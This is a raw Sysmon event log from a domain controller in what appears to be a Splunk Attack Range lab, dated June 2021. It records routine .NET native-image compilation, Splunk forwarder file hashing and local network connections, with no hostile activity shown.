21:03:19.547{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A197-60D3-2803-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.378{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F4943A78C7221CBA6D6B7BB995E1E4,SHA256=9917C93E880702C96F89337BA5B235ED4397F56BCE098762F88D3F4618515CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.219{4DB9351A-A190-60D3-2703-00000000CF01}5144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HFNMWU5YPL\PresentationCore.ni.dll.auxMD5=09F710A079AEC3D8687367D47C6AD79D,SHA256=A7657195592D48E46ADFAC5E028396D9181FD81FBCA53AAC7DF3014F20CDA284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.219{4DB9351A-A190-60D3-2703-00000000CF01}5144NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HFNMWU5YPL\PresentationCore.ni.dllMD5=65590C4A2888D0BB9BC6F60898796305,SHA256=27FED9E1D1D1D410A4F7F3439C0B8C7A5D061766BE9349FFADDDBBB60858FFEE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000020039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.735{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03FFF3FA5A642A800CAB9BDFF83CC1E2,SHA256=3B9BA50503477D961BE38333B35B870412A5830F340BA4DD47CAD9B32E6A2F7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.735{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C4D0E2FFA9EE6F48EEABBC37511676B,SHA256=6290478ECB5FEE374C8827686CD7478D312CA2D589E4978F7CD5C317AF9AB55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.391{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5099452D649B968BE30457055493B2E,SHA256=96F10064EE1652D7742817D0B195FFDCFE05572D7ABCDC367EDC9C1F77530B22,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.172{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A198-60D3-2903-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.141{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A198-60D3-2903-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:20.141{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A198-60D3-2903-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000020041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:19.210{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61412-false10.0.1.12-8000- 23542300x800000000000000020040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:21.516{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69F88912D9D1FF6943DBC67F84DD578A,SHA256=E0B17C3C94FA7377F9FB82EDFDA7FF679D6E781B76DBA8017002F7FA8F38BE67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:22.610{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31B78F933E982B843802D8560A8EBC4F,SHA256=77720BE2F23B4CFFB24052915177611CF91C99A974847F7883664905D904C35E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:23.610{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D95D4D1CE148596B0255C3D0A422058,SHA256=92625C4CBB0EC4DC7C14E4891AAD303882F57C62098D14A2B58A28E736D5F4B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:24.703{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61E8112DFE95B2280F90D39D51AB797,SHA256=6FB0C3D52017ADAD2B16CCA2ACEF107DE68719AEADCBAB66EAA0103515553692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:25.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD500DA49B27AEACAE95DD23AD601FCB,SHA256=993B020C2A11E1881C5198D3B9D33A60FF2C145A42A3D020BFAF7262EF4FE9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:26.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=336301D22252CEE6649853DB08FC911E,SHA256=C23A18174AECECD456F4F77AF8023B83F320477AD9246E97AA271E3FC4F870B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:25.257{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61413-false10.0.1.12-8000- 23542300x800000000000000020046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:26.125{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C55377B6E01541D08CBA49948C91AE25,SHA256=B4F042BF166C4D2B49070DCEE216B0A8B4F9990CA0DAB8AF68E019C85B041191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:27.766{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3AF4DB7BEA50BF0EC0573DCD3FE0478,SHA256=3B1DD58657A654C5E8FEF45CD27C0C1D56F6EC820AAFFB2E604F7C2277600E98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:27.266{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045996C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1000-00000000CF01}104C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:28.797{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=881431F41D774F6D6AE7B026EA3E29BB,SHA256=3708C29507A7EB7580213D48395AB4DCF2A21BDE6E19DE0FA28A2F94B9B07AE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:26.882{4DB9351A-9DDD-60D3-1200-00000000CF01}416C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 23542300x800000000000000020053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:29.813{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABE21EA76CB06F62D4D35F9FDF9E38E4,SHA256=A6E49D2B3D10A8E4907121E5F9BC17593CAADE3FD16121C48748D7B167BD770F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.909{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.894{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.894{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A2-60D3-2A03-00000000CF01}1088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.862{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CE415D14DCB7863CF9038983D67E84,SHA256=744FA084996E2F4E639D2AA15F1DB19F92B9571DDEB1EBCC3096462BEAAA58B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.565{4DB9351A-A198-60D3-2903-00000000CF01}5892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3UA6AGWATA\PresentationFramework.ni.dll.auxMD5=8F1FD4778E91747A58145154E17EA5AF,SHA256=5F51126070FAC3B2FE9EFFC6F556531FCF6A24E2CDABA5256662A878DFC9E787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:30.565{4DB9351A-A198-60D3-2903-00000000CF01}5892NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3UA6AGWATA\PresentationFramework.ni.dllMD5=4EB0ACB2849F125982D53B74DBA06226,SHA256=BAB44F496D0350D8D73DD0CC0D493CC1C5F26C6A4959F50CBBDA7560E58A220E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000020054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:30.159{4DB9351A-A198-60D3-2903-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1704-0\PresentationFramework.dll2021-06-23 21:03:30.159 23542300x800000000000000020075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D524089EAC3C83530DF0C017011D8EB,SHA256=3FF63511DD69335CB909B203A0117B1DA21814AAB65A1B1CAAC9D6AECC6460CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.909{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28C5202C9B5D84F66FA4AC458DF62E43,SHA256=916474E125A5FE5C59F687DB82F93035E8C2C258A9117C9B21AABA88FDABB72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.909{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03FFF3FA5A642A800CAB9BDFF83CC1E2,SHA256=3B9BA50503477D961BE38333B35B870412A5830F340BA4DD47CAD9B32E6A2F7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.831{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.815{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.815{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A3-60D3-2D03-00000000CF01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:31.503{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A3-60D3-2C03-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 